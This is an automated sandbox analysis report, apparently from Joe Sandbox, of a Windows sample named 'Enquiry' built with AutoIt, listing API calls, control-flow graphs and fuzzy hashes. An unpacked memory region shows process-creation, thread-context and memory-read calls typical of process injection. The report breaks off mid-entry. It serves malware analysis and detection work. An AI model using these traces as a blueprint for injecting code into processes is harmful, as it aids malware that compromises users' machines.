CloseHandle 2195->2197 2198 413dc2a-413dc2e 2195->2198 2196->2155 2197->2198 2199 413dc30-413dc3b VirtualFree 2198->2199 2200 413dc3e-413dc47 2198->2200 2199->2200 2200->2150 2200->2155
                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0413DAF1
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0413DD17
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728586669.000000000413B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0413B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_413b000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction ID: 85fee071e493d77c7b0325bd091090ae9cbf6931ec01433cbdedc2e2a0e770a4
                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction Fuzzy Hash: 37A12970E00209EBDB14CFA4D994BEEBBB5FF48706F208599E501BB280D7B5AA40CF54

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2201 401250-40125c 2202 401262-401293 call 412f40 call 401b80 2201->2202 2203 4012e8-4012ed 2201->2203 2208 4012d1-4012e2 KillTimer SetTimer 2202->2208 2209 401295-4012b5 2202->2209 2208->2203 2210 4012bb-4012bf 2209->2210 2211 4272ec-4272f2 2209->2211 2214 4012c5-4012cb 2210->2214 2215 42733f-427346 2210->2215 2212 4272f4-427315 Shell_NotifyIconW 2211->2212 2213 42731a-42733a Shell_NotifyIconW 2211->2213 2212->2208 2213->2208 2214->2208 2218 427393-4273b4 Shell_NotifyIconW 2214->2218 2216 427348-427369 Shell_NotifyIconW 2215->2216 2217 42736e-42738e Shell_NotifyIconW 2215->2217 2216->2208 2217->2208 2218->2208
                            APIs
                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 3300667738-0
                            • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                            • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2222 427190-4271ae RegQueryValueExW 2219->2222 2223 40e4eb-40e4f0 2219->2223 2224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2222->2224 2225 42721a-42722a RegCloseKey 2222->2225 2230 427210-427219 call 436508 2224->2230 2231 4271f7-42720e call 402160 2224->2231 2230->2225 2231->2230
                            APIs
                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID: Include$Software\AutoIt v3\AutoIt
                            • API String ID: 1586453840-614718249
                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                            APIs
                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$Copy$ClearErrorLast
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 2487901850-572801152
                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                            APIs
                              • Part of subcall function 0413D6E0: Sleep.KERNELBASE(000001F4), ref: 0413D6F1
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0413D913
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728586669.000000000413B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0413B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_413b000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: 3NKGQ3CFC8XVCMZYZC2OV
                            • API String ID: 2694422964-3041147696
                            • Opcode ID: 3c493ac95788a697ee6456e30c59a368908736e3d5a67a5e1461dc77ca5c99a3
                            • Instruction ID: d10d9c3adbe2ca0931ca7cdbb57170e15c512c3e3d2ff8a7518c53f325dc94dd
                            • Opcode Fuzzy Hash: 3c493ac95788a697ee6456e30c59a368908736e3d5a67a5e1461dc77ca5c99a3
                            • Instruction Fuzzy Hash: 5F519270D0424DEAEF11DBB4D954BEEBBB8AF05309F004199E608BB2C0D7B95B44CBA5
                            APIs
                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Close$OpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 1607946009-824357125
                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                            APIs
                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                            • _wcsncpy.LIBCMT ref: 004102ED
                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                            • _wcsncpy.LIBCMT ref: 00410340
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                            • String ID:
                            • API String ID: 3170942423-0
                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0413CE9B
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0413CF31
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0413CF53
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728586669.000000000413B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0413B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_413b000_Enquiry.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                            • Instruction ID: 7269dbb1fd74d54b86edd6e8dcd50dfc6222913550d111f22337482bbd57f980
                            • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                            • Instruction Fuzzy Hash: D8620A30A14258DBEB24CFA4D890BDEB376EF58301F1091A9D10DEB394E775AE81CB59
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                            • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                            • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                            • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0047950F
                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                            • VariantClear.OLEAUT32(?), ref: 00479650
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: 81882916ed450cc42db375fcf7c21005814c176867ddcffa7bb55a60db91dd5f
                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                            • Opcode Fuzzy Hash: 81882916ed450cc42db375fcf7c21005814c176867ddcffa7bb55a60db91dd5f
                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: Error:
                            • API String ID: 4104443479-232661952
                            • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                            • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                            • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                            • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                            APIs
                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                            • String ID: X$pWH
                            • API String ID: 85490731-941433119
                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                            APIs
                            • _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 00401B57
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                            • String ID: @EXITCODE
                            • API String ID: 2734553683-3436989551
                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                            • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 1794320848-0
                            • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                            • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
